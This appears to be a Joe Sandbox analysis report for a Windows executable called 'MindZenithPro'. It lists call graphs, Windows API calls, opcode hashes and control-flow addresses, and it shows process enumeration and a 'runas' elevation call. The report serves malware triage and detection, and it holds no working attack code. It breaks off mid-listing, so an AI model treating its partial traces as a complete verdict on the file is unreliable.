__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 105998 3f2739 105997->105998 105998->105968 105999->105997 106038 3e2690 106000->106038 106003 3e0ccf 106003->105971 106040 3e4f1f 106004->106040 106007->105972 106008->105975 106009->105977 106010->105980 106011->105958 106013->105984 106014->105986 106019 3fd547 106015->106019 106018 3e300d 8 API calls 3 library calls 106018->105991 106022 3fd560 106019->106022 106023 3fd564 106019->106023 106021 3e0228 106021->105989 106021->106018 106030 3e0ddc 106022->106030 106023->106022 106025 3f4e95 106023->106025 106026 3f4e9c 106025->106026 106027 3f4edf GetStdHandle 106026->106027 106028 3f4f47 106026->106028 106029 3f4ef2 GetFileType 106026->106029 106027->106026 106028->106023 106029->106026 106031 3e0de7 IsProcessorFeaturePresent 106030->106031 106032 3e0de5 106030->106032 106034 3e0fad 106031->106034 106032->106021 106037 3e0f71 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 106034->106037 106036 3e1090 106036->106021 106037->106036 106039 3e0cbc GetStartupInfoW 106038->106039 106039->106003 106041 3e4f2b FindHandlerForForeignException 106040->106041 106042 3e4f44 106041->106042 106043 3e4f32 106041->106043 106064 3f32ae EnterCriticalSection 106042->106064 106079 3e5079 GetModuleHandleW 106043->106079 106046 3e4f37 106046->106042 106080 3e50bd GetModuleHandleExW 106046->106080 106051 3e4f4b 106060 3e4fc0 106051->106060 106063 3e4fe9 106051->106063 106065 3f2468 106051->106065 106052 3e5006 106071 3e5038 106052->106071 106053 3e5032 106088 402079 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 106053->106088 106056 3f26e1 _abort 5 API calls 106062 3e4fd8 106056->106062 106057 3f26e1 _abort 5 API calls 106057->106063 106060->106056 106060->106062 106062->106057 106068 3e5029 106063->106068 106064->106051 106089 3f21a1 106065->106089 106108 3f32f6 LeaveCriticalSection 106068->106108 106070 3e5002 106070->106052 106070->106053 106109 3f395c 106071->106109 106074 3e5066 106077 3e50bd _abort 8 API calls 106074->106077 106075 3e5046 GetPEB 106075->106074 106076 3e5056 GetCurrentProcess TerminateProcess 106075->106076 106076->106074 106078 3e506e ExitProcess 106077->106078 106079->106046 106081 3e510a 106080->106081 106082 3e50e7 GetProcAddress 106080->106082 106084 3e5119 106081->106084 106085 3e5110 FreeLibrary 106081->106085 106083 3e50fc 106082->106083 106083->106081 106086 3e0ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 106084->106086 106085->106084 106087 3e4f43 106086->106087 106087->106042 106092 3f2150 106089->106092 106091 3f21c5 106091->106060 106093 3f215c ___DestructExceptionObject 106092->106093 106100 3f32ae EnterCriticalSection 106093->106100 106095 3f216a 106101 3f21f1 106095->106101 106099 3f2188 __wsopen_s 106099->106091 106100->106095 106104 3f2211 106101->106104 106105 3f2219 106101->106105 106102 3e0ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 106103 3f2177 106102->106103 106107 3f2195 LeaveCriticalSection _abort 106103->106107 106104->106102 106105->106104 106106 3f2d18 _free 20 API calls 106105->106106 106106->106104 106107->106099 106108->106070 106110 3f3977 106109->106110 106111 3f3981 106109->106111 106113 3e0ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 106110->106113 106116 3f3327 5 API calls 2 library calls 106111->106116 106114 3e5042 106113->106114 106114->106074 106114->106075 106115 3f3998 106115->106110 106116->106115 106117 4145d7 106118 3de28e 22 API calls 106117->106118 106119 4145ed 106118->106119 106120 414668 106119->106120 106128 3da921 23 API calls 106119->106128 106122 3cc210 201 API calls 106120->106122 106126 4146b4 106122->106126 106124 414648 106124->106126 106129 4321a8 22 API calls 106124->106129 106125 41515e 106126->106125 106130 433d0b 82 API calls __wsopen_s 106126->106130 106128->106124 106129->106120 106130->106125 106131 412f96 106145 3cdd50 ISource 106131->106145 106132 3ce0b1 PeekMessageW 106132->106145 106133 3cdda7 GetInputState 106133->106132 106133->106145 106134 412254 TranslateAcceleratorW 106134->106145 106136 3cdfa4 timeGetTime 106136->106145 106137 3ce12f PeekMessageW 106137->106145 106138 3ce113 TranslateMessage DispatchMessageW 106138->106137 106139 3ce14f Sleep 106156 3ce160 106139->106156 106140 41310a Sleep 106140->106156 106141 412370 timeGetTime 106198 3da921 23 API calls 106141->106198 106142 3def0e timeGetTime 106142->106156 106144 42dac1 47 API calls 106144->106156 106145->106132 106145->106133 106145->106134 106145->106136 106145->106137 106145->106138 106145->106139 106145->106140 106145->106141 106148 3cdf75 106145->106148 106159 3cf1e0 201 API calls 106145->106159 106160 3d19c0 201 API calls 106145->106160 106161 3cc210 201 API calls 106145->106161 106163 3ce2f0 106145->106163 106170 3ce570 106145->106170 106193 3df3b7 106145->106193 106199 434199 22 API calls 106145->106199 106200 433d0b 82 API calls __wsopen_s 106145->106200 106146 4131a1 GetExitCodeProcess 106150 4131b7 WaitForSingleObject 106146->106150 106151 4131cd CloseHandle 106146->106151 106147 45317d GetForegroundWindow 106147->106156 106150->106145 106150->106151 106151->106156 106152 412fc7 106152->106148 106153 41323f Sleep 106153->106145 106156->106142 106156->106144 106156->106145 106156->106146 106156->106147 106156->106148 106156->106152 106156->106153 106201 445ddf 22 API calls 106156->106201 106202 42efbc QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 106156->106202 106159->106145 106160->106145 106161->106145 106164 3ce30f 106163->106164 106165 3ce323 106163->106165 106203 3cd7f0 106164->106203 106235 433d0b 82 API calls __wsopen_s 106165->106235 106168 3ce31a 106168->106145 106169 41350b 106169->106169 106171 3ce5b0 106170->106171 106184 3ce67c ISource 106171->106184 106246 3e0592 5 API calls __Init_thread_wait 106171->106246 106173 433d0b 82 API calls 106173->106184 106175 413560 106177 3cae03 22 API calls 106175->106177 106175->106184 106176 3cae03 22 API calls 106176->106184 106179 41357a 106177->106179 106247 3e03f3 29 API calls __onexit 106179->106247 106182 413584 106248 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106182->106248 106184->106173 106184->106176 106187 3d0b40 22 API calls 106184->106187 106189 3cf1e0 201 API calls 106184->106189 106190 3ce981 106184->106190 106243 3cad69 22 API calls __fread_nolock 106184->106243 106244 3cacbd 40 API calls 106184->106244 106245 3db215 201 API calls 106184->106245 106249 3e0592 5 API calls __Init_thread_wait 106184->106249 106250 3e03f3 29 API calls __onexit 106184->106250 106251 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106184->106251 106252 444f5b 201 API calls 106184->106252 106253 447048 201 API calls 106184->106253 106187->106184 106189->106184 106190->106145 106195 3df3ca 106193->106195 106197 3df3d3 106193->106197 106194 3df3f7 IsDialogMessageW 106194->106195 106194->106197 106195->106145 106196 41f895 GetClassLongW 106196->106194 106196->106197 106197->106194 106197->106195 106197->106196 106198->106145 106199->106145 106200->106145 106201->106156 106202->106156 106204 3cf1e0 201 API calls 106203->106204 106205 3cd82d 106204->106205 106206 41215a 106205->106206 106208 3cd89b ISource 106205->106208 106209 3cd953 106205->106209 106210 3cdc65 106205->106210 106215 3cda48 106205->106215 106219 3e012b 22 API calls 106205->106219 106230 3cd9b9 ISource __fread_nolock 106205->106230 106242 433d0b 82 API calls __wsopen_s 106206->106242 106208->106168 106209->106210 106212 3cd95e 106209->106212 106210->106208 106220 3e015b 22 API calls 106210->106220 106211 3cdb8f 106213 3cdba4 106211->106213 106214 41214b 106211->106214 106216 3e012b 22 API calls 106212->106216 106217 3e012b 22 API calls 106213->106217 106241 445e8c 22 API calls 106214->106241 106221 3e015b 22 API calls 106215->106221 106224 3cd965 __fread_nolock 106216->106224 106227 3cd9fa 106217->106227 106219->106205 106220->106224 106221->106230 106222 3e012b 22 API calls 106223 3cd986 106222->106223 106223->106230 106236 3cc0f0 201 API calls 106223->106236 106224->106222 106224->106223 106226 41213a 106240 433d0b 82 API calls __wsopen_s 106226->106240 106227->106168 106230->106211 106230->106226 106230->106227 106231 412115 106230->106231 106233 4120f3 106230->106233 106237 3c1c48 201 API calls 106230->106237 106239 433d0b 82 API calls __wsopen_s 106231->106239 106238 433d0b 82 API calls __wsopen_s 106233->106238 106235->106169 106236->106230 106237->106230 106238->106227 106239->106227 106240->106227 106241->106206 106242->106208 106243->106184 106244->106184 106245->106184 106246->106175 106247->106182 106248->106184 106249->106184 106250->106184 106251->106184 106252->106184 106253->106184 106254 3c1044 106259 3c2c6f 106254->106259 106256 3c104a 106294 3e03f3 29 API calls __onexit 106256->106294 106258 3c1054 106295 3c4045 106259->106295 106263 3c2ce6 106264 3cae03 22 API calls 106263->106264 106265 3c2cf0 106264->106265 106266 3cae03 22 API calls 106265->106266 106267 3c2cfa 106266->106267 106268 3cae03 22 API calls 106267->106268 106269 3c2d04 106268->106269 106270 3cae03 22 API calls 106269->106270 106271 3c2d42 106270->106271 106272 3cae03 22 API calls 106271->106272 106273 3c2e0e 106272->106273 106305 3c540c 106273->106305 106277 3c2e40 106278 3cae03 22 API calls 106277->106278 106279 3c2e4a 106278->106279 106280 3d1fd0 9 API calls 106279->106280 106281 3c2e75 106280->106281 106332 3c2b93 106281->106332 106283 3c2e91 106284 3c2ea1 GetStdHandle 106283->106284 106285 402ff2 106284->106285 106286 3c2ef6 106284->106286 106285->106286 106287 3e012b 22 API calls 106285->106287 106288 3c2f03 OleInitialize 106286->106288 106289 403002 106287->106289 106288->106256 106339 4307ee InitializeCriticalSectionAndSpinCount 106289->106339 106291 40300b 106342 431015 106291->106342 106294->106258 106345 3c409e 106295->106345 106298 3c409e 22 API calls 106299 3c407d 106298->106299 106300 3cae03 22 API calls 106299->106300 106301 3c4089 106300->106301 106302 3c7467 22 API calls 106301->106302 106303 3c2ca5 106302->106303 106304 3c2a8d 6 API calls 106303->106304 106304->106263 106306 3cae03 22 API calls 106305->106306 106307 3c541c 106306->106307 106308 3cae03 22 API calls 106307->106308 106309 3c5424 106308->106309 106352 3c70c5 106309->106352 106312 3c70c5 22 API calls 106313 3c5434 106312->106313 106314 3cae03 22 API calls 106313->106314 106315 3c543f 106314->106315 106316 3e012b 22 API calls 106315->106316 106317 3c2e18 106316->106317 106318 3c2af5 106317->106318 106319 3c2b03 106318->106319 106320 3cae03 22 API calls 106319->106320 106321 3c2b0e 106320->106321 106322 3cae03 22 API calls 106321->106322 106323 3c2b19 106322->106323 106324 3cae03 22 API calls 106323->106324 106325 3c2b24 106324->106325 106326 3cae03 22 API calls 106325->106326 106327 3c2b2f 106326->106327 106328 3c70c5 22 API calls 106327->106328 106329 3c2b3a 106328->106329 106330 3e012b 22 API calls 106329->106330 106331 3c2b41 RegisterWindowMessageW 106330->106331 106331->106277 106333 402fde 106332->106333 106334 3c2ba3 106332->106334 106355 433978 22 API calls 106333->106355 106335 3e012b 22 API calls 106334->106335 106337 3c2bab 106335->106337 106337->106283 106338 402fe9 106356 430a42 106339->106356 106343 431023 CreateThread 106342->106343 106344 403017 FindCloseChangeNotification 106342->106344 106343->106344 106359 430ffb 106343->106359 106344->106286 106346 3cae03 22 API calls 106345->106346 106347 3c40a9 106346->106347 106348 3cae03 22 API calls 106347->106348 106349 3c40b1 106348->106349 106350 3cae03 22 API calls 106349->106350 106351 3c4073 106350->106351 106351->106298 106353 3cae03 22 API calls 106352->106353 106354 3c542c 106353->106354 106354->106312 106355->106338 106357 430a50 GetCurrentProcess GetCurrentProcess DuplicateHandle 106356->106357 106358 43082d InterlockedExchange 106356->106358 106357->106358 106358->106291 106360 431005 106359->106360 106361 43100a 106359->106361 106363 430ec0 InterlockedExchange 106360->106363 106364 430ef1 106363->106364 106365 430eeb 106363->106365 106367 3e015b 22 API calls 106364->106367 106366 3e015b 22 API calls 106365->106366 106366->106364 106368 430f03 ReadFile 106367->106368 106369 430f26 106368->106369 106370 430fd2 106368->106370 106369->106370 106371 430f30 EnterCriticalSection 106369->106371 106375 430f58 __fread_nolock 106369->106375 106372 430feb InterlockedExchange 106370->106372 106371->106369 106371->106375 106372->106361 106373 430fa3 LeaveCriticalSection ReadFile 106373->106369 106373->106370 106374 3e015b 22 API calls 106374->106375 106375->106373 106375->106374 106376 402f58 106377 3c280d 106376->106377 106378 402f62 106376->106378 106404 3c286b 7 API calls 106377->106404 106380 3c3dd1 24 API calls 106378->106380 106381 402f6b 106380->106381 106383 3ca1d4 22 API calls 106381->106383 106386 402f79 106383->106386 106385 3c2817 106390 3c3989 61 API calls 106385->106390 106396 3c282c 106385->106396 106387 402f81 106386->106387 106388 402fa8 106386->106388 106389 3c59dc 22 API calls 106387->106389 106391 3c59dc 22 API calls 106388->106391 106392 402f8c 106389->106392 106390->106396 106403 402fa4 GetForegroundWindow ShellExecuteW 106391->106403 106408 3c6aa4 22 API calls 106392->106408 106395 3c2847 106399 3c284e SetCurrentDirectoryW 106395->106399 106396->106395 106398 3c2f14 Shell_NotifyIconW 106396->106398 106397 402f9a 106400 3c59dc 22 API calls 106397->106400 106398->106395 106402 3c2862 106399->106402 106400->106403 106401 402fd9 106401->106395 106403->106401 106409 3c29bc 7 API calls 106404->106409 106406 3c2812 106407 3c294b CreateWindowExW CreateWindowExW ShowWindow ShowWindow 106406->106407 106407->106385 106408->106397 106409->106406 106410 41e5f9 106411 41e5a6 106410->106411 106413 42e568 SHGetFolderPathW 106411->106413 106414 3c7467 22 API calls 106413->106414 106415 42e595 106414->106415 106415->106411 106416 3c1727 SystemParametersInfoW 106417 3ce360 106420 3d9ee3 106417->106420 106419 3ce36c 106421 3d9f04 106420->106421 106426 3d9f61 106420->106426 106423 3cf1e0 201 API calls 106421->106423 106421->106426 106427 3d9f35 106423->106427 106424 417f48 106424->106424 106425 3d9fa5 106425->106419 106426->106425 106430 433d0b 82 API calls __wsopen_s 106426->106430 106427->106425 106427->106426 106429 3cad69 22 API calls __fread_nolock 106427->106429 106429->106426 106430->106424

                                    Executed Functions

                                    Function 003C4E68 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 224libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 530 3c4e68-3c4ed7 call 3cae03 GetVersionExW call 3c7467 535 3c4edd 530->535 536 4040e6-4040f9 530->536 537 3c4edf-3c4ee1 535->537 538 4040fa-4040fe 536->538 539 404125 537->539 540 3c4ee7-3c4f40 call 3c8635 call 3c699d 537->540 541 404100 538->541 542 404101-40410d 538->542 545 40412c-404136 539->545 554 404259-404260 540->554 555 3c4f46-3c4f48 540->555 541->542 542->538 544 40410f-404111 542->544 544->537 547 404117-40411e 544->547 548 404138-404144 545->548 549 404149-404155 545->549 547->536 551 404120 547->551 552 3c4fa6-3c4fc0 GetCurrentProcess IsWow64Process 548->552 549->552 551->539 556 3c501f-3c5025 552->556 557 3c4fc2 552->557 558 404280-404283 554->558 559 404262 554->559 561 3c4f4e-3c4f51 555->561 562 40415a-40416d 555->562 560 3c4fc8-3c4fd4 556->560 557->560 567 404285-404294 558->567 568 40426e-404276 558->568 565 404268 559->565 569 3c4fda-3c4fe9 LoadLibraryA 560->569 570 40429e-4042a2 GetSystemInfo 560->570 561->552 566 3c4f53-3c4f8f 561->566 563 404196-404198 562->563 564 40416f-404178 562->564 575 40419a-4041af 563->575 576 4041cd-4041d0 563->576 573 404185-404191 564->573 574 40417a-404180 564->574 565->568 566->552 577 3c4f91-3c4f9a 566->577 567->565 578 404296-40429c 567->578 568->558 571 3c4feb-3c4ff9 GetProcAddress 569->571 572 3c5027-3c5031 GetSystemInfo 569->572 571->572 579 3c4ffb-3c4fff GetNativeSystemInfo 571->579 580 3c5001-3c5003 572->580 573->552 574->552 581 4041b1-4041b7 575->581 582 4041bc-4041c8 575->582 584 4041d2-4041ed 576->584 585 40420b-40420e 576->585 577->545 583 3c4fa0 577->583 578->568 579->580 587 3c500c-3c501e 580->587 588 3c5005-3c5006 FreeLibrary 580->588 581->552 582->552 583->552 589 4041fa-404206 584->589 590 4041ef-4041f5 584->590 585->552 586 404214-40423b 585->586 591 404248-404254 586->591 592 40423d-404243 586->592 588->587 589->552 590->552 591->552 592->552
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 003C4E97
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    • GetCurrentProcess.KERNEL32(?,0045DB24,00000000,?,?), ref: 003C4FAD
                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 003C4FB4
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 003C4FDF
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003C4FF1
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 003C4FFF
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 003C5006
                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 003C502B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 3290436268-192647395
                                    • Opcode ID: 0aadb67083129c98551e191a7cf8c41d4ce06f27b62ed316a24389b135f087d8
                                    • Instruction ID: 49fea15b4298a807569fc5c69232b3b1f5da5e074983bb56f5c2757f1030bf1f
                                    • Opcode Fuzzy Hash: 0aadb67083129c98551e191a7cf8c41d4ce06f27b62ed316a24389b135f087d8
                                    • Instruction Fuzzy Hash: 5B91836290E290FFD732CB787E445A97F946B7670070444BFED80E7266D2AC4848CB2D
                                    Function 00402F58 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003C2853
                                      • Part of subcall function 003C3DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00402A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 003C3DEF
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00483204), ref: 00402FC3
                                    • ShellExecuteW.SHELL32(00000000,?,?,00483204), ref: 00402FCA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                    • String ID: $I$runas
                                    • API String ID: 448630720-2084237920
                                    • Opcode ID: 3fb266b999bc38fe8835b942fa1f43fadd31d98a8a19217d887391bc7dcc643a
                                    • Instruction ID: 05949615cafe93c05ffd48db950c6a93f37149a9ba6d231e4202d050faa580a6
                                    • Opcode Fuzzy Hash: 3fb266b999bc38fe8835b942fa1f43fadd31d98a8a19217d887391bc7dcc643a
                                    • Instruction Fuzzy Hash: EF11EE71608305AACB16FB20E955F6FBBA49FA0304F40083EF442DA0A3CB789D49C796
                                    Function 0042DAC1 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0042DAE6
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0042DAF4
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0042DB14
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0042DBC1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3243318325-0
                                    • Opcode ID: 25d05ff2376feb2afaf1b1afcd7569251b4f02a0d3755b24bfcf2808e8bf6028
                                    • Instruction ID: db8e907b0dfff880c67702fba51ce52e5e2ad89ca8c7c753a7f0917163f09ae1
                                    • Opcode Fuzzy Hash: 25d05ff2376feb2afaf1b1afcd7569251b4f02a0d3755b24bfcf2808e8bf6028
                                    • Instruction Fuzzy Hash: 5B317E725083059FD311EF60D885FAFBBE8AF99344F44092DF581C61A2EB71AA45CB93
                                    Function 0042E1AC Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00403902), ref: 0042E1BC
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0042E1CD
                                    • FindClose.KERNEL32(00000000), ref: 0042E1DD
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: 7753a973c248d7e4c9234dd876234d630c3dccc615db915116d174b8a611e6cd
                                    • Instruction ID: fa96b56db9b822b9fcfbce8c2db0ff42f18ece9612b07dfe7526af8342d89b13
                                    • Opcode Fuzzy Hash: 7753a973c248d7e4c9234dd876234d630c3dccc615db915116d174b8a611e6cd
                                    • Instruction Fuzzy Hash: 3DE04F359246206B92206739FC0D8FA7B5C9E06336F500B76F975C22E0EB74DA50869E
                                    Function 003E5038 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,?,003E500E,00000003,004898A8,0000000C,003E5165,00000003,00000002,00000000,?,003F2C35,00000003), ref: 003E5059
                                    • TerminateProcess.KERNEL32(00000000,?,003E500E,00000003,004898A8,0000000C,003E5165,00000003,00000002,00000000,?,003F2C35,00000003), ref: 003E5060
                                    • ExitProcess.KERNEL32 ref: 003E5072
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 14a182a931388d7ea6010c421f26671b520292511daf71e249a98722416e2036
                                    • Instruction ID: a48cb15c31a43c9ad444a4ba2e3caeb258854e2f6d7a487346320f28f2596dd3
                                    • Opcode Fuzzy Hash: 14a182a931388d7ea6010c421f26671b520292511daf71e249a98722416e2036
                                    • Instruction Fuzzy Hash: B8E08C32401A88AFCF226F51CD08A583F69EF0038AF044024FC048A572CB75DE42CB94
                                    Function 003DAAF7 Relevance: 26.9, APIs: 1, Strings: 14, Instructions: 671COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 3daaf7-3daf1c call 3c7e30 call 3dbb11 call 3cd530 7 418446-418453 0->7 8 3daf22-3daf2c 0->8 11 418455 7->11 12 418458-418467 7->12 9 41882d-41883b 8->9 10 3daf32-3daf37 8->10 17 418840 9->17 18 41883d 9->18 13 3daf3d-3daf49 call 3db46f 10->13 14 418474-418476 10->14 11->12 15 418469 12->15 16 41846c 12->16 21 41847f 13->21 25 3daf4f-3daf5c call 3cb81d 13->25 14->21 15->16 16->14 19 418847-418850 17->19 18->17 22 418852 19->22 23 418855 19->23 26 418489 21->26 22->23 27 41885e-4188ad call 3cd530 call 3dba77 * 2 23->27 33 3daf64-3daf6d 25->33 31 418491-418494 26->31 65 4188b3-4188c5 call 3db46f 27->65 66 3db099-3db0ae 27->66 34 41849a-4184c2 call 3e4cb3 call 3c69c4 31->34 35 3db011-3db028 31->35 37 3daf71-3daf8f call 3e4d78 33->37 76 4184c4-4184c8 34->76 77 4184ef-418513 call 3c6a09 call 3cac28 34->77 40 3db02e 35->40 41 418816-418819 35->41 50 3daf9e 37->50 51 3daf91-3daf9a 37->51 45 4187c1-4187e2 call 3cd530 40->45 46 3db034-3db037 40->46 47 418903-41893b call 3cd530 call 3dba77 41->47 48 41881f-418822 41->48 45->66 69 4187e8-4187fa call 3db46f 45->69 56 3db03d-3db040 46->56 57 4185eb-418605 call 3dba77 46->57 47->66 101 418941-418953 call 3db46f 47->101 48->27 58 418824-418827 48->58 50->26 61 3dafa4-3dafb5 50->61 51->37 59 3daf9c 51->59 67 3db046-3db049 56->67 68 41858c-4185a2 call 3c5a63 56->68 87 418751-418777 call 3cd530 57->87 88 41860b-41860e 57->88 58->9 58->66 59->61 61->9 70 3dafbb-3dafd5 61->70 106 4188f1-4188fe call 3cb81d 65->106 107 4188c7-4188cf 65->107 71 3db0b4-3db0c4 call 3cd530 66->71 72 41898b-418991 66->72 79 3db04f-3db071 call 3cd530 67->79 80 418518-41851b 67->80 68->66 104 4185a8-4185be call 3db46f 68->104 112 418807 69->112 113 4187fc-418805 call 3cb81d 69->113 70->31 84 3dafdb-3db00d call 3dba77 call 3cd530 70->84 72->33 90 418997 72->90 76->77 92 4184ca-4184ed call 3c9c50 76->92 77->80 79->66 110 3db073-3db085 call 3db46f 79->110 80->9 85 418521-418536 call 3c5a63 80->85 84->35 85->66 131 41853c-418552 call 3db46f 85->131 87->66 134 41877d-41878f call 3db46f 87->134 99 418681-4186a0 call 3cd530 88->99 100 418610-418613 88->100 90->9 92->76 92->77 99->66 151 4186a6-4186b8 call 3db46f 99->151 116 418619-418636 call 3cd530 100->116 117 41899c-4189aa 100->117 147 418955-41895d 101->147 148 418977-418980 call 3cb81d 101->148 152 4185c0-4185cd call 3c7e30 104->152 153 4185cf-4185d8 call 3c7e30 104->153 144 418984-418986 106->144 108 4188d1-4188d5 107->108 109 4188e0-4188eb call 3ca344 107->109 108->109 124 4188d7-4188db 108->124 109->106 157 4189cd-4189db 109->157 158 3db08b-3db097 110->158 159 41857c-418585 call 3cb81d 110->159 130 41880b-418811 112->130 113->130 116->66 161 41863c-41864e call 3db46f 116->161 137 4189ac 117->137 138 4189af-4189bf 117->138 140 418963-418965 124->140 130->66 172 418554-41855d call 3cb81d 131->172 173 41855f-41856d call 3c7e30 131->173 177 418791-41879e call 